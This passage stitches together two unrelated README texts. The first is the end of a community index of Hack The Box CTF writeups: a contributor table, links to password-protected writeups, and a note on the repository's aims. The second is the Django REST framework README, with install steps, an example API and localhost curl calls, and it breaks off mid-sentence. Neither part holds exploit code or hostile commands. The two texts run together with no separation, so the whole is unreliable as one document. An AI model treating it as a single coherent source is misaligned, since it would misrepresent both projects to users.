width="42">](https://www.hackthebox.eu/home/users/profile/37256) | [PwnD34L3rS](https://www.hackthebox.eu/home/teams/profile/920) | [Helpline](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Helpline/markuk-helpline.pdf) | | <img src="./images/countries/france.png" height="24" width="24"> | lduros | [<img src="./images/lduros.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/70671) | solitaire wolf | [SwagShop](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/SwagShop/loicduros-SwagShop.pdf) | | <img src="./images/countries/uk.png" height="24" width="24"> | explmuzz | [<img src="./images/explmuzz.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/33961) | [N00b543V3R](https://www.hackthebox.eu/home/teams/profile/164) | [Bastion](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bastion/explmuzz-Bastion.pdf) | | <img src="./images/countries/world.png" height="24" width="24"> | AlhA | [<img src="./images/AlhA.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/63348) | solitaire wolf | | [Emdee Five for Live](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Emdee%20five%20for%20life/AlhA-Emdee_Five_For_Life.zip) | <img src="./images/countries/uk.png" height="24" width="24"> | liamm | [<img src="./images/liamm.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/6123) | [PORTKNOCKWHOSTHERE](https://www.hackthebox.eu/home/teams/profile/1288) | [Jarvis](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jarvis/liamm-Jarvis.pdf) | | <img src="./images/countries/greece.png" height="24" width="24"> | cavla | [<img src="./images/cavla.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/115536) | Solitaire wolf | | [Crooked Crockford](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Crooked%20Crockford/cavla-Crooked_Crockford.pdf) | <img src="./images/countries/sweden.png" height="24" width="24"> | entropy | [<img src="./images/entropy.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/47876) | Solitaire wolf | | [Crooked Crockford](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Crooked%20Crockford/Entropy-Crooked_Crockford.zip) | <img src="./images/countries/brazil.png" height="24" width="24"> | MrP4p3r | [<img src="./images/MrP4p3r.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/55453) | Solitaire wolf | | [Fuzzy](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Fuzzy/MrP4p3r-Fuzzy.pdf) | <img src="./images/countries/world.png" height="24" width="24"> | emmanuel | [<img src="./images/emmanuel.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/39975) | Solitaire wolf | [Craft](https://github.com/emmaunel/hackthebox-writeups/blob/master/machines/Craft/emmanuel-craft.pdf)| | <img src="./images/countries/world.png" height="24" width="24"> | Cript0crc | [<img src="./images/crypt0crc.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/2128) | Solitaire wolf | | [Eemedefive for live](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Emdee%20five%20for%20life/Cript0crc-emdee_five_for_life.zip)| <img src="./images/countries/world.png" height="24" width="24"> | bWlrZQo | [<img src="./images/bWlrZQo.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/146577) | [USCh4ck3r5](https://www.hackthebox.eu/home/teams/profile/1712) | [Craft](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Craft/bWlrZQo-Craft.pdf) | | <img src="./images/countries/world.png" height="24" width="24"> | naveen1729 | [<img src="./images/naveen1729.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/158833) | Solitaire wolf | [Player](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Player/naveen1729-player.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | AmbrotD | [<img src="./images/pepelu.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/31970) | Solitaire wolf || [USB Ripper ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/usbripper-ambrotd.pdf ) | | <img src="./images/countries/spain.png" height="24" width="24"> | danielcues | [<img src="./images/danielcues.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/20220) | [Ripp3rs](https://www.hackthebox.eu/home/teams/profile/1782) | | [Mission Impossible](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Mission%20Impossible/Mission%20Impossible%20-%20danielcues.pdf) | <img src="./images/countries/germany.png" height="24" width="24"> | arcc | [<img src="./images/arcc.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/165891) | Solitaire wolf| [json](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Json/HTB%20write-up_%20Json%20-%20by%20arcc_encrypted.pdf) [bitlab](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Bitlab/Write-Up_%20bitlab%20-%20by%20arcc_encrypted.pdf)| <img src="./images/countries/india.png" height="24" width="24"> | CRYPT0HEX | [<img src="./images/CRYPT0HEX.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/45998) |Solitaire wolf | [Writeup](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/writeup/CRYPT0HEX-writeup.pdf) | | <img src="./images/countries/pakistan.png" height="24" width="24"> | couchpotato | [<img src="./images/couchpotato.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/60494) | Solitaire wolf | [Heist](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Heist/couchpotato-Heist.pdf) | | <img src="./images/countries/australia.png" height="24" width="24"> | sneakypanda | [<img src="./images/sneakypanda.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/100087) | [Mystiko](https://www.hackthebox.eu/home/teams/profile/1834) | [Zetta](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Zetta/sneakypanda-zetta.pdf) | | <img src="./images/countries/switzerland.png" height="24" width="24"> | nitrow | [<img src="./images/GDK.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/116659) | Solitaire wolf | | [Image Processing 101](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/ImageProcessing101/nitrow-imageprocessing101.pdf) | <img src="./images/countries/colombia.png" height="24" width="24"> | Cyb3rb0b | [<img src="./images/Cyb3rb0b.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/61047) | Solitaire wolf | [Json](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Json/Cyb3rb0b-Json.pdf) | <img src="./images/countries/uk.png" height="24" width="24"> | N7E | [<img src="./images/N7E.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/184764) | [iamroot](https://www.hackthebox.eu/home/teams/profile/2098) | [Mango](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mango/n7e-mango.pdf) | <img src="./images/countries/india.png" height="24" width="24"> | Parteek Singh | [<img src="./images/parteeksingh.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/17564) | [D3v1L5](https://www.hackthebox.eu/home/teams/profile/2017) | [Sniper](https://github.com/parteeksingh005/hackthebox-writeups/blob/master/machines/Sniper/Sniper_Writeup-Parteek%20Singh.pdf) | | <img src="./images/countries/canada.png" height="24" width="24"> | c1cada | [<img src="./images/c1cada.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/168018) | CommandlineKings | [Obscurity](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Obscurity/HTB%20Obscurity-c1cada.pdf) | | <img src="./images/countries/india.png" height="24" width="24"> | Mrigendra Soni | [<img src="./images/mrigendra.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/89725) | Solitaire Wolf | [Postman](https://github.com/Mrig26/hackthebox-writeups/blob/master/machines/Postman/isuroot-Postman.pdf) | | <img src="./images/countries/usa.png" height="24" width="24">| mikeywayne |<img src="https://www.hackthebox.eu/storage/avatars/57bdca8ee4a702c56371607d6fbc9a7a.png" height="42" width="42"> | Solitaire Wolf | [traverxec](https://github.com/Michael-Wayne-Wells/traverxec-writeup.git)| | <img src="./images/countries/spain.png" height="24" width="24">| Milo |<img src="https://www.hackthebox.eu/storage/avatars/0430c06bb395df9e041bc729cb70436c.png" height="42" width="42"> | p0t4t03s | | [ezpz](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/ezpz/Ezpz_k10000.pdf) | | <img src="./images/countries/india.png" height="24" width="24"> | N1Z4M | [<img src="./images/nizam.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/91021) | [7eam4dholokam](https://www.hackthebox.eu/home/teams/profile/1625) | [OpenAdmin](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OpenAdmin/HTB-N1Z4M-OpenAdmin.pdf) | <img src="./images/countries/indonesia.png" height="24" width="24"> | corshine | [<img src="./images/corshine.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/122977) | Solitaire Wolf | [OpenAdmin](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OpenAdmin/HTB-CORSHINE-OpenAdmin.pdf) | <img src="./images/countries/usa.png" height="24" width="24"> | SevenLayerJedi | [<img src="./images/SevenLayerJedi.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/84131) | Solitaire Wolf | [Nest](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nest/SevenLayerJedi-Nest.pdf) | <img src="./images/countries/singapore.png" height="24" width="24"> | IamKsNoob | [<img src="./images/iamksnoob.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/151049) | Solitaire Wolf | [Postman](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Postman/IamKsNoob-Postman.pdf) | <img src="./images/countries/tunisia.png" height="24" width="24"> | Bayrem | [<img src="./images/bayrem.jpg" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/10568) | | | [Cartographer](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/cartographer/INTJic-Cartographer.zip) | <img src="./images/countries/tunisia.png" height="24" width="24"> | Bayrem | [<img src="./images/bayrem.jpg" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/10568) | Solitaire Wolf | | [Cartographer](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/cartographer/INTJic-Cartographer.zip) | <img src="./images/countries/saudiarabia.png" height="24" width="24"> | 3gbCyber | [<img src="./images/3gbCyber.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/191167) | [KAU](https://www.hackthebox.eu/home/teams/profile/2139) | [OpenAdmin](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OpenAdmin/3gbCyber-OpenAdmin.pdf) | <img src="./images/countries/usa.png" height="24" width="24"> | FlapJack | [<img src="./images/FlapJack.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/6397) | [NashvilleCTF](https://www.hackthebox.eu/home/teams/profile/1993) | [OpenAdmin](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OpenAdmin/FlapJack-OpenAdmin.pdf) | <img src="./images/countries/usa.png" height="24" width="24"> | wazKoo | [<img src="./images/wazKoo.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/103543) | [ScripTease](https://www.hackthebox.eu/home/teams/profile/2491) | [Traceback](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traceback/wazKoo-traceback.pdf) | <img src="./images/countries/world.png" height="24" width="24"> | Shkk | [<img src="./images/Shkk.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/96787) | Solitaire wolf | [Monteverde](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Monteverde/Shkk-Monteverde.pdf) | <img src="./images/countries/poland.png" height="24" width="24"> | elklepo | [<img src="https://www.hackthebox.eu/storage/avatars/e05d5e9f7f1c8aae15de81b1ba1dcb13.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/144313) | [notSoBad](https://www.hackthebox.eu/home/teams/profile/2540) | [Fatty](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Fatty/elklepo-Fatty.pdf) | <img src="./images/countries/austria.png" height="24" width="24"> | Chr0x6eOs | [<img src="https://www.hackthebox.eu/storage/avatars/25cf508b0c1a47dca6ced9166fcdd0fc.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/134448) | SickaLoot | | [QuickR](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/QuickR/Chr0x6eOs_QuickR.pdf) <img src="./images/countries/russia.png" height="24" width="24"> | dayld | [<img src="./images/dayld.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/121547) | Solitaire wolf | | [breaking grad](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/breaking%20grad/dayld-breaking%20grad.pdf) <img src="./images/countries/canada.png" height="24" width="24"> | 7riple7hrea7 | [<img src="./images/7riple7hrea7.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/10663) | [p0tat0z](https://www.hackthebox.eu/home/teams/profile/202) | | [Interdimensional Internet](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Interdimensional%20Internet/7riple7hrea7_interdimensional_internet_writeup.pdf) <img src="./images/countries/france.png" height="24" width="24"> | caracal | [<img src="./images/caracal.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/219989) | [HideAndSec](https://www.hackthebox.eu/home/teams/profile/2075) | | [Mr. Burns](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Mr.%20Burns/caracal-mrburns.pdf) <img src="./images/countries/france.png" height="24" width="24"> | aminegr | [<img src="./images/aminegr.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/35604) | Solitaire Wolf | | [Emdee five for life](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Emdee%20five%20for%20life/aminegr-Emdee_five_for_life.pdf) <img src="./images/countries/philippines.png" height="24" width="24"> | run3 | [<img src="./images/run3.jpg" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/223654) | [hack2tan](https://www.hackthebox.eu/home/teams/profile/2963) | | [Mission Pinpossible](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/Hardware/Mission%2DPinpossible%2Dwriteup%2Drun3.pdf) <img src="./images/countries/singapore.png" height="24" width="24"> | Isopach | [<img src="./images/isopach.jpg" height="42" width="42">](https://www.hackthebox.eu/profile/269983) | Solitaire Wolf | | [Baby RE](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Baby%20RE/Isopach%20-%20Baby%20RE.pdf) <img src="./images/countries/world.png" height="24" width="24"> | YoavD | [<img src="./images/YoavD.png" height="42" width="42">](https://www.hackthebox.eu/profile/55745) | Solitaire Wolf | | [HackyBird](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/HackyBird/YoavD-HackyBird.pdf) <img src="./images/countries/indonesia.png" height="24" width="24"> | adhkr | [<img src="./images/adhkr.png" height="42" width="42">](https://www.hackthebox.eu/profile/80291) | Solitaire Wolf | [Stocker] | # Special note Hack the Box is a superb platform to learn pentesting, there are many challenges and machines of different levels and with each one you manage to pass you learn a new thing. But talking among ourselves we realized that many times there are several ways to get rooting a machine, get a flag ... That's why we created this repository, as a site to share different unofficial writeups to see different techniques and acquire even more knowledge. That is our goal and our passion, to share to learn together. Some people have been distrustful because in this repository there are writeups of active machines, even knowing that absolutely each one of them is protected with the corresponding password (root flag or challenge). But We did not want to give up this because we think the most interesting thing for a HTB player is to check other users' walkthroughs right after they get it, that is, not wait for weeks or months afterwards. For this reason, we have asked the HTB admins and they have given us a pleasant surprise: in the future, they are going to add the ability for users to submit writeups directly to HTB which can automatically be unlocked after owning a machine. And also, they merge in all of the writeups from this github page. Simply great! Therefore it is a real pride that they have decided to include the functionality of this repo directly on their platform. When this is done, this Github will be migrated and will be inactive but with a pleasantly fulfilled mission. Until then, Keep pushing! *Hackplayers community, HTB Hispano & Born2root groups*. [adhkr-Stocker]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Stocker/htb-stocker-adhkr.pdf [noraj-Academy]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Academy/academy-HTB-WU-noraj.pdf [noraj-Admirer]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Admirer/admirer-HTB-WU-noraj.pdf [noraj-Blackfield]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Blackfield/blackfield-HTB-WU-noraj.pdf [noraj-Blunder]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Blunder/blunder-HTB-WU-noraj.pdf [noraj-Book]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Book/book-HTB-WU-noraj.pdf [noraj-Buff]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Buff/buff-HTB-WU-noraj.pdf [noraj-Cache]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Cache/cache-HTB-WU-noraj.pdf [noraj-Cascade]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Cascade/cascade-HTB-WU-noraj.pdf [noraj-Control]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Control/control-HTB-WU-noraj.pdf [noraj-Doctor]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Doctor/doctor-HTB-WU-noraj.pdf [noraj-Dyplesher]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Dyplesher/dyplesher-HTB-WU-noraj.pdf [noraj-Fatty]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Fatty/fatty-HTB-WU-noraj.pdf [noraj-ForwardSlash]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/ForwardSlash/forwardslash-HTB-WU-norj.pdf [noraj-Jewel]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jewel/jewel-HTB-WU-noraj.pdf [noraj-Laboratory]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Laboratory/laboratory-HTB-WU-noraj.pdf [noraj-Magic]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Magic/magic-HTB-WU-noraj.pdf [noraj-Mango]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mango/mango-HTB-WU-noraj.pdf [noraj-Monteverde]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Monteverde/monteverde-HTB-WU-noraj.pdf [noraj-Nest]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nest/nest-HTB-WU-noraj.pdf [noraj-Obscurity]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Obscurity/obscurity-HTB-WU-noraj.pdf [noraj-Omni]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Omni/omni-HTB-WU-noraj.pdf [noraj-Oouch]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Oouch/oouch-HTB-WU-noraj.pdf [noraj-OpenAdmin]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OpenAdmin/openadmin-HTB-WU-noraj.pdf [noraj-Passage]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Passage/passage-HTB-WU-noraj.pdf [noraj-Remote]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Remote/remote-HTB-WU-noraj.pdf [noraj-Resolute]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Resolute/resolute-HTB-WU-noraj.pdf [noraj-ServMon]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Servmon/servmon-HTB-WU-noraj.pdf [noraj-SneakyMailer]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/SneakyMailer/sneakymailer-HTB-WU-norj.pdf [noraj-Tabby]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Tabby/tabby-HTB-WU-noraj.pdf [noraj-Traceback]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traceback/traceback-HTB-WU-noraj.pdf [noraj-Traverxec]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traverxec/traverxec-HTB-WU-noraj.pdf [noraj-Worker]:https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Worker/worker-HTB-WU-noraj.pdf [apehex-crypto-baby-encryption]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/BabyEncryption/apehex_baby-encryption.zip [apehex-crypto-baby-quick-maffs]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/baby%20quick%20maffs/apehex_baby-quick-maffs.zip [apehex-crypto-baby-time-capsule]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Baby%20Time%20Capsule/apehex_baby-time-capsule.zip [apehex-crypto-bbgun06]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/BBGun06/apehex_bbgun06.zip [apehex-crypto-broken-decryptor]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Broken%20Decryptor/apehex_broken-decryptor.zip [apehex-crypto-composition]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Composition/apehex_composition.zip [apehex-crypto-embryonic-plant]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Embryonic%20Plant/apehex_embryonic-plant.zip [apehex-crypto-flippin-bank]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Flippin%20Bank/apehex_flippin-bank.zip [apehex-crypto-lost-modulus]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Lost%20Modulus/apehex_lost-modulus.zip [apehex-crypto-lost-modulus-again]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Lost%20Modulus%20Again/apehex_lost-modulus-again.zip [apehex-crypto-luna-crypt]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/LunaCrypt/apehex_luna-crypt.zip [apehex-crypto-mysterybox]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/mysterybox/apehex_mysterybox.zip [apehex-crypto-nuclear-sale]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Nuclear%20Sale/apehex_nuclear-sale.zip [apehex-crypto-optimus-prime]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Optimus_Prime/apehex_optimus-prime.zip [apehex-crypto-protein-cookies]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Protein%20Cookies/apehex_Protein-Cookies.zip [apehex-crypto-quick-maffs]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/quick%20maffs/apehex_quick-maffs.pdf [apehex-crypto-quantum-safe]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Quantum-Safe/apehex_quantum-safe.zip [apehex-crypto-rlotto]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/RLotto/apehex_rlotto.zip [apehex-crypto-rookie-mistake]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Rookie%20Mistake/apehex_rookie-mistake.7z [apehex-crypto-rsa-ctf-tool]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/RsaCtfTool/apehex_rsa-ctf-tool.zip [apehex-crypto-rsa-is-easy]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/RSAisEasy/apehex_rsa-is-easy.zip [apehex-crypto-signup]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/signup/apehex_signup.pdf [apehex-crypto-the-last-dance]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/The%20Last%20Dance/apehex_the-last-dance.zip [apehex-crypto-two-for-one]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/TwoForOne/apehex_two-for-one.zip [apehex-crypto-xorxorxor]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/xorxorxor/apehex_xorxorxor.zip [apehex-forensics-diagnostic]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/Diagnostic/apehex_diagnostic.zip [apehex-forensics-emo]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/emo/apehex_emo.zip [apehex-forensics-market-dump]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/MarketDump/apehex_market-dump.zip [apehex-forensics-obfsc4t10n]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/oBfsC4t10n/apehex_obfsc4t10n.zip [apehex-forensics-obfsc4t10n2]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/oBfsC4t10n2/apehex_obfsc4t10n2.zip [apehex-forensics-obscure]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/Obscure/apehex_obscure.zip [apehex-forensics-perseverance]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/Perseverance/apehex_perseverance.zip [apehex-forensics-persistence-is-futile]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/PersistenceIsFutile/apehex_persistence-is-futile.zip [apehex-forensics-red-failure]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/Red%20Failure/apehex_red-failure.zip [apehex-forensics-usb-ripper]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/USB%20Ripper/apehex_usb-ripper.zip [apehex-forensics-windows-infinity-edge]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/Window's%20Infinity%20Edge/apehex_windows-infinity-edge.zip [apehex-misc-query]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/Query/apehex_Query.pdf [apehex-reversing-exatlon]: https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Exatlon/apehex_Exatlon.pdf
# [Django REST framework][docs] [![build-status-image]][travis] [![coverage-status-image]][codecov] [![pypi-version]][pypi] [![Gitter](https://badges.gitter.im/tomchristie/django-rest-framework.svg)](https://gitter.im/tomchristie/django-rest-framework?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) **Awesome web-browsable Web APIs.** Full documentation for the project is available at [http://www.django-rest-framework.org][docs]. --- # Funding REST framework is a *collaboratively funded project*. If you use REST framework commercially we strongly encourage you to invest in its continued development by [signing up for a paid plan][funding]. The initial aim is to provide a single full-time position on REST framework. *Every single sign-up makes a significant impact towards making that possible.* [![][rover-img]][rover-url] [![][sentry-img]][sentry-url] [![][stream-img]][stream-url] [![][machinalis-img]][machinalis-url] [![][rollbar-img]][rollbar-url] Many thanks to all our [wonderful sponsors][sponsors], and in particular to our premium backers, [Rover][rover-url], [Sentry][sentry-url], [Stream][stream-url], [Machinalis][machinalis-url], and [Rollbar][rollbar-url]. --- # Overview Django REST framework is a powerful and flexible toolkit for building Web APIs. Some reasons you might want to use REST framework: * The [Web browsable API][sandbox] is a huge usability win for your developers. * [Authentication policies][authentication] including optional packages for [OAuth1a][oauth1-section] and [OAuth2][oauth2-section]. * [Serialization][serializers] that supports both [ORM][modelserializer-section] and [non-ORM][serializer-section] data sources. * Customizable all the way down - just use [regular function-based views][functionview-section] if you don't need the [more][generic-views] [powerful][viewsets] [features][routers]. * [Extensive documentation][docs], and [great community support][group]. There is a live example API for testing purposes, [available here][sandbox]. **Below**: *Screenshot from the browsable API* ![Screenshot][image] ---- # Requirements * Python (2.7, 3.4, 3.5, 3.6) * Django (1.10, 1.11, 2.0) # Installation Install using `pip`... pip install djangorestframework Add `'rest_framework'` to your `INSTALLED_APPS` setting. INSTALLED_APPS = ( ... 'rest_framework', ) # Example Let's take a look at a quick example of using REST framework to build a simple model-backed API for accessing users and groups. Startup up a new project like so... pip install django pip install djangorestframework django-admin.py startproject example . ./manage.py migrate ./manage.py createsuperuser Now edit the `example/urls.py` module in your project: ```python from django.conf.urls import url, include from django.contrib.auth.models import User from rest_framework import serializers, viewsets, routers # Serializers define the API representation. class UserSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = User fields = ('url', 'username', 'email', 'is_staff') # ViewSets define the view behavior. class UserViewSet(viewsets.ModelViewSet): queryset = User.objects.all() serializer_class = UserSerializer # Routers provide a way of automatically determining the URL conf. router = routers.DefaultRouter() router.register(r'users', UserViewSet) # Wire up our API using automatic URL routing. # Additionally, we include login URLs for the browsable API. urlpatterns = [ url(r'^', include(router.urls)), url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')) ] ``` We'd also like to configure a couple of settings for our API. Add the following to your `settings.py` module: ```python INSTALLED_APPS = ( ... # Make sure to include the default installed apps here. 'rest_framework', ) REST_FRAMEWORK = { # Use Django's standard `django.contrib.auth` permissions, # or allow read-only access for unauthenticated users. 'DEFAULT_PERMISSION_CLASSES': [ 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly' ] } ``` That's it, we're done! ./manage.py runserver You can now open the API in your browser at `http://127.0.0.1:8000/`, and view your new 'users' API. If you use the `Login` control in the top right corner you'll also be able to add, create and delete users from the system. You can also interact with the API using command line tools such as [`curl`](https://curl.haxx.se/). For example, to list the users endpoint: $ curl -H 'Accept: application/json; indent=4' -u admin:password http://127.0.0.1:8000/users/ [ { "url": "http://127.0.0.1:8000/users/1/", "username": "admin", "email": "[email protected]", "is_staff": true, } ] Or to create a new user: $ curl -X POST -d username=new -d [email protected] -d is_staff=false -H 'Accept: application/json; indent=4' -u admin:password http://127.0.0.1:8000/users/ { "url": "http://127.0.0.1:8000/users/2/", "username": "new", "email": "[email protected]", "is_staff": false, } # Documentation & Support Full documentation for the project is available at [http://www.django-rest-framework.org][docs]. For questions and support, use the [REST framework discussion group][group], or `#restframework` on freenode IRC. You may also want to [follow the author on Twitter][twitter]. # Security If you believe you've found something in Django REST framework which has security implications, please **do not raise the issue in a public forum**. Send a description of the issue via email to [[email protected]][security-mail]. The project maintainers will then work with you to resolve any issues where required, prior to any public 